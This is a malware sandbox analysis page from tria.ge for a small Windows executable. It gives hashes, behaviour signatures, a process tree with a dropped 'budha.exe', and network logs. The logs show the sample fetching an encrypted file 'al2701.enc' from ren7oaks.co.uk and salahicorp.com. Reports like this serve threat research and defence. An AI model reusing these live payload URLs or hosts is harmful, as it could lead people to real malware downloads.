Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Samples 6/...ca.exe

windows7-x64

7

Samples 6/...ca.exe

windows10-2004-x64

7

Samples 6/...4e.exe

windows7-x64

10

Samples 6/...4e.exe

windows10-2004-x64

10

Samples 6/...31.exe

windows7-x64

10

Samples 6/...31.exe

windows10-2004-x64

10

Samples 6/...4b.exe

windows7-x64

7

Samples 6/...4b.exe

windows10-2004-x64

7

Samples 6/...1a.exe

windows7-x64

10

Samples 6/...1a.exe

windows10-2004-x64

10

Samples 6/...18.exe

windows7-x64

1

Samples 6/...18.exe

windows10-2004-x64

1

Samples 7/...22.exe

windows7-x64

3

Samples 7/...22.exe

windows10-2004-x64

3

Samples 7/...41.exe

windows7-x64

10

Samples 7/...41.exe

windows10-2004-x64

10

Samples 7/...62.exe

windows7-x64

10

Samples 7/...62.exe

windows10-2004-x64

10

Samples 7/...c5.exe

windows7-x64

10

Samples 7/...c5.exe

windows10-2004-x64

10

Samples 7/...a6.exe

windows7-x64

10

Samples 7/...a6.exe

windows10-2004-x64

10

Samples 7/...64.exe

windows7-x64

10

Samples 7/...64.exe

windows10-2004-x64

10

Samples 7/...a5.exe

windows7-x64

10

Samples 7/...a5.exe

windows10-2004-x64

10

Samples 7/...0d.exe

windows7-x64

10

Samples 7/...0d.exe

windows10-2004-x64

10

Samples 7/...de.exe

windows7-x64

7

Samples 7/...de.exe

windows10-2004-x64

7

Samples 7/...de.exe

windows7-x64

10

Samples 7/...de.exe

windows10-2004-x64

10

Resubmissions

07/01/2024, 18:26 UTC

240107-w3ameabffn 10

Analysis

  • max time kernel
    1s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    07/01/2024, 18:26 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Samples 6/c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca.exe

  • Size

    7KB

  • MD5

    9612c12e7c958af8eddf9ebf341ad754

  • SHA1

    39a96f9934706cc22a34a9398dc1dd4e7d03d738

  • SHA256

    c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca

  • SHA512

    d13a58955741eaa148b7fd55ad690e7f4c9fa53beb06dbc4a6b5ef527bfb23ef9999e2ea5c0ed93ddc519e410f6f6f6ea16cad9702eaa21e08e2bc69bcbf9c22

  • SSDEEP

    192:HpEwzsViovM7q1YpmYiogbJgigbGgJgigoD9NwEt:HpEwIIj7+YptYPv8PVH

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Samples 6\c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca.exe
    "C:\Users\Admin\AppData\Local\Temp\Samples 6\c4ec2c4d73a45bba85debe9fe243708bb52afd29dc95d7fdefed02cd34c375ca.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Users\Admin\AppData\Local\Temp\budha.exe
      "C:\Users\Admin\AppData\Local\Temp\budha.exe"
      2⤵
      • Executes dropped EXE
      PID:2352

Network

  • flag-us
    DNS
    ren7oaks.co.uk
    Remote address:
    8.8.8.8:53
    Request
    ren7oaks.co.uk
    IN A
    Response
    ren7oaks.co.uk
    IN A
    185.151.30.204
  • flag-gb
    GET
    http://ren7oaks.co.uk/images/al2701.enc
    Remote address:
    185.151.30.204:80
    Request
    GET /images/al2701.enc HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: ren7oaks.co.uk
    Cache-Control: no-cache
    Response
    HTTP/1.1 301
    content-length: 0
    location: https://ren7oaks.co.uk/images/al2701.enc
    x-via: LHR3
  • flag-us
    DNS
    salahicorp.com
    Remote address:
    8.8.8.8:53
    Request
    salahicorp.com
    IN A
    Response
    salahicorp.com
    IN A
    34.168.225.46
  • flag-us
    DNS
    salahicorp.com
    Remote address:
    8.8.8.8:53
    Request
    salahicorp.com
    IN A
    Response
  • flag-us
    DNS
    salahicorp.com
    Remote address:
    8.8.8.8:53
    Request
    salahicorp.com
    IN A
  • flag-us
    GET
    http://salahicorp.com/up/al2701.enc
    Remote address:
    34.168.225.46:80
    Request
    GET /up/al2701.enc HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: salahicorp.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 07 Jan 2024 18:34:00 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=175b3e5a7a9b57864135291034215add|89.149.23.59|1704652440|1704652440|0|1|0; path=/; domain=.salahicorp.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=89.149.23.59; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • 185.151.30.204:80
    http://ren7oaks.co.uk/images/al2701.enc
    http
    513 B
     309 B
     8
    5

    HTTP Request

    GET http://ren7oaks.co.uk/images/al2701.enc

    HTTP Response

    301
  • 185.151.30.204:443
    ren7oaks.co.uk
    tls
    395 B
     175 B
     5
    4
  • 185.151.30.204:443
    ren7oaks.co.uk
    tls
    449 B
     222 B
     7
    5
  • 185.151.30.204:443
    ren7oaks.co.uk
    tls
    388 B
     171 B
     7
    4
  • 185.151.30.204:443
    ren7oaks.co.uk
    190 B
     88 B
     4
    2
  • 185.151.30.204:443
    ren7oaks.co.uk
    tls
    395 B
     175 B
     5
    4
  • 185.151.30.204:443
    ren7oaks.co.uk
    tls
    570 B
     175 B
     7
    4
  • 185.151.30.204:443
    ren7oaks.co.uk
    tls
    340 B
     175 B
     6
    4
  • 185.151.30.204:443
    ren7oaks.co.uk
    190 B
     88 B
     4
    2
  • 34.168.225.46:80
    http://salahicorp.com/up/al2701.enc
    http
    733 B
     498 B
     7
    2

    HTTP Request

    GET http://salahicorp.com/up/al2701.enc

    HTTP Response

    200
  • 8.8.8.8:53
    ren7oaks.co.uk
    dns
    60 B
     76 B
     1
    1

    DNS Request

    ren7oaks.co.uk

    DNS Response

    185.151.30.204

  • 8.8.8.8:53
    salahicorp.com
    dns
    180 B
     136 B
     3
    2

    DNS Request

    salahicorp.com

    DNS Request

    salahicorp.com

    DNS Request

    salahicorp.com

    DNS Response

    34.168.225.46

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\budha.exe
    Filesize

    7KB

    MD5

    98bc96fd2508f93e40ba3a8c8e40d199

    SHA1

    4912ecd1e774f8c1b7aa2bdaa94ef477f01f8c12

    SHA256

    b2e779a05b06840f138cfc0c2145df5158818affcf10e595380ff2ce364bcefb

    SHA512

    f0abe8d07c097c13767b35c36cdab1ea7247f85c6ca1fbd17672adf92409ac45c93478c614a5679193d8ed09cc366e36343ca45cd6968bcce5cb500162b24856

    Download Submit

  • memory/2208-0-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2208-10-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2208-12-0x0000000001F50000-0x0000000001F59000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2208-17-0x0000000001F50000-0x0000000001F59000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2352-13-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.